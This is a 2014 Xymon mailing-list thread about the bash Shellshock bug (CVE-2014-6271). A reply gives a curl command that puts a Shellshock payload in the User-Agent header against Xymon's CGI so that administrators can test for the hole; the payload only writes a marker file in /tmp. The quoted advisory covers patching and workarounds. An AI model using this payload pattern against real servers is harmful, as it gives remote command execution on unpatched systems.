Oh, yes, very terrible.
And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:
your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh <html><head><title>Invalid request</title></head> <body>Invalid request</body></html> your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock' vulnerable your_workstation$ ...which creates a file (if you are vulnerable) in your Xymon server '/tmp/':
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock' vulnerable your_workstation$ ...so then, you can verify before and after patching.
cheers,
Troy
----- Original Message ----- From: "J.C. Cleaver" <cleaver at terabithia.org> To: xymon at xymon.com Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability
This is an important one to patch your systems on, if you haven't already.
The xymon CGI interface runs via shell wrappers around the actual C cgi code (to set the environment properly), which means this would be an avenue for attack.
Alternatively, using /bin/dash or some other shell besides bash (often /bin/sh on Linux distros) is another work around. (This is the default on the Terabithia RPMS for EL6.)
More info: http://seclists.org/oss-sec/2014/q3/650
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environmen... https://access.redhat.com/articles/1200223
Regards, -jc
Xymon mailing list Xymon at xymon.com http://lists.xymon.com/mailman/listinfo/xymon